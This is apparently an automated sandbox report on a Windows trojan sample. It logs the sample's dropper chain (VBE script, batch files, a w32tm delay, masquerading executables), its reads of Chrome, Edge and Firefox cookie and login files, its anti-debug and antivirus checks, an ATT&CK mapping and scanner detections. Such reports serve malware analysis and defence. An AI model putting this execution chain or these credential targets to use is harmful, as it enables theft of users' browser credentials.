                          Source: CJF0Ri1HrG.exe, 00000000.00000002.1623066278.0000000002965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\V
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2857122847.0000000000943000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                          Source: w32tm.exe, 0000000C.00000002.1969770805.0000029742279000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                          Source: CJF0Ri1HrG.exe, 00000000.00000003.1620326689.0000000002960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\@WV
                          Source: hyperbrokerhostNetsvc.exe, 00000005.00000000.1877081316.0000000000632000.00000002.00000001.01000000.0000000A.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe0.5.dr, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe.5.dr, TextInputHost.exe.5.dr, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe2.5.dr, hyperbrokerhostNetsvc.exe.0.dr, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe1.5.drBinary or memory string: MTFXU6PmHgFsVvykXgRk
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeAPI call chain: ExitProcess graph end nodegraph_0-23658
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037F838
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_00387DEE mov eax, dword ptr fs:[00000030h]0_2_00387DEE
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0038C030 GetProcessHeap,0_2_0038C030
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037F838
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037F9D5 SetUnhandledExceptionFilter,0_2_0037F9D5
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0037FBCA
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_00388EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00388EBD
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe "C:\Program Files (x86)\msbuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe" Jump to behavior
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager Z
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037F654 cpuid 0_2_0037F654
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0037AF0F
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\PortCommon\hyperbrokerhostNetsvc.exe VolumeInformationJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Code function: 0_2_0037DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0037DF1E
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exe Code function: 0_2_0036B146 GetVersionExW,0_2_0036B146
                          Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara match File source: 0000000D.00000002.2858831534.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 0000000D.00000002.2858831534.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 0000000D.00000002.2858831534.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: 00000005.00000002.1922668864.0000000012CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: Process Memory Space: hyperbrokerhostNetsvc.exe PID: 6780, type: MEMORYSTR
                          Source: Yara match File source: Process Memory Space: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe PID: 4520, type: MEMORYSTR
                          Source: Yara match File source: 5.0.hyperbrokerhostNetsvc.exe.630000.0.unpack, type: UNPACKEDPE
                          Source: Yara match File source: 00000005.00000000.1877081316.0000000000632000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara match File source: 00000000.00000003.1616007019.0000000006DF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match File source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, type: DROPPED
                          Source: Yara match File source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara match File source: C:\Users\Public\TextInputHost.exe, type: DROPPED
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior

                          Remote Access Functionality

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 11 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 141 Windows Management Instrumentation; 1 Native API; 2 Command and Scripting Interpreter; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 11 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 12 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 142 Masquerading; 261 Virtualization/Sandbox Evasion; 12 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 3 File and Directory Discovery; 157 System Information Discovery; 351 Security Software Discovery; 2 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Encrypted Channel; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
[Behavior graph: ID 1403873, Sample: CJF0Ri1HrG.exe, Startdate: 06/03/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label
CJF0Ri1HrG.exe | 58% | ReversingLabs | ByteCode-MSIL.Trojan.Vigorf
CJF0Ri1HrG.exe | 49% | Virustotal
CJF0Ri1HrG.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label
C:\Users\user\Desktop\AFgebewE.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\nxxgerdx.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\kekpPWli.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Users\Public\TextInputHost.exe | 100% | Avira | HEUR/AGEN.1339906
C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe | 100% | Avira | VBS/Runner.VPG
C:\Users\user\Desktop\OnibhGNt.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\avRZftgA.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\XWBrRjTb.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat | 100% | Avira | BAT/Runner.IL
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | 100% | Avira | HEUR/AGEN.1339906
C:\PortCommon\hyperbrokerhostNetsvc.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | 100% | Avira | HEUR/AGEN.1339906
C:\Users\user\Desktop\PgdUomGa.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\TOksRAfO.log | 100% | Avira | HEUR/AGEN.1362695
C:\Users\user\Desktop\KxrkaJNA.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\GHBtTNNH.log | 100% | Avira | HEUR/AGEN.1362695
C:\Users\user\Desktop\AFgebewE.log | 100% | Joe Sandbox ML
C:\Users\user\Desktop\nxxgerdx.log | 100% | Joe Sandbox ML
C:\Users\Public\TextInputHost.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | 100% | Joe Sandbox ML
C:\PortCommon\hyperbrokerhostNetsvc.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\jHHpWudE.log | 100% | Joe Sandbox ML
C:\PortCommon\hyperbrokerhostNetsvc.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom
C:\PortCommon\hyperbrokerhostNetsvc.exe | 75% | Virustotal
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom
C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | 75% | Virustotal
C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom
C:\Program Files (x86)\Windows Photo Viewer\en-GB\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe | 75% | Virustotal
C:\Users\Public\TextInputHost.exe | 92% | ReversingLabs | ByteCode-MSIL.Trojan.Mardom
C:\Users\Public\TextInputHost.exe | 75% | Virustotal
C:\Users\user\Desktop\AFgebewE.log | 4% | ReversingLabs
C:\Users\user\Desktop\AFgebewE.log | 9% | Virustotal
C:\Users\user\Desktop\CHTNxNAz.log | 12% | ReversingLabs
C:\Users\user\Desktop\CHTNxNAz.log | 4% | Virustotal
C:\Users\user\Desktop\EMydcNjR.log | 10% | ReversingLabs
C:\Users\user\Desktop\EMydcNjR.log | 24% | Virustotal
C:\Users\user\Desktop\EsydEbLs.log | 17% | ReversingLabs
C:\Users\user\Desktop\EsydEbLs.log | 4% | Virustotal
C:\Users\user\Desktop\GHBtTNNH.log | 12% | ReversingLabs
C:\Users\user\Desktop\GHBtTNNH.log | 7% | Virustotal
C:\Users\user\Desktop\KxrkaJNA.log | 17% | ReversingLabs
C:\Users\user\Desktop\KxrkaJNA.log | 6% | Virustotal
C:\Users\user\Desktop\OnibhGNt.log | 17% | ReversingLabs
C:\Users\user\Desktop\OnibhGNt.log | 20% | Virustotal
C:\Users\user\Desktop\PgdUomGa.log | 17% | ReversingLabs
C:\Users\user\Desktop\PgdUomGa.log | 6% | Virustotal
C:\Users\user\Desktop\QpUJDpSo.log | 13% | ReversingLabs
C:\Users\user\Desktop\QpUJDpSo.log | 9% | Virustotal
C:\Users\user\Desktop\RMxJvRbT.log | 9% | ReversingLabs
C:\Users\user\Desktop\RMxJvRbT.log | 6% | Virustotal
C:\Users\user\Desktop\RUhcZACY.log | 10% | ReversingLabs
C:\Users\user\Desktop\RUhcZACY.log | 24% | Virustotal
C:\Users\user\Desktop\TOksRAfO.log | 12% | ReversingLabs
C:\Users\user\Desktop\TOksRAfO.log | 7% | Virustotal
C:\Users\user\Desktop\WixjfVXd.log | 12% | ReversingLabs
C:\Users\user\Desktop\WixjfVXd.log | 6% | Virustotal
C:\Users\user\Desktop\XWBrRjTb.log | 62% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\XWBrRjTb.log | 69% | Virustotal
C:\Users\user\Desktop\aMYstPaD.log | 12% | ReversingLabs
C:\Users\user\Desktop\aMYstPaD.log | 6% | Virustotal
C:\Users\user\Desktop\avRZftgA.log | 17% | ReversingLabs
C:\Users\user\Desktop\avRZftgA.log | 20% | Virustotal
                          No Antivirus matches
Source | Detection | Scanner | Label
h172956.srv11.test-hf.su | 13% | Virustotal
Source | Detection | Scanner | Label
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
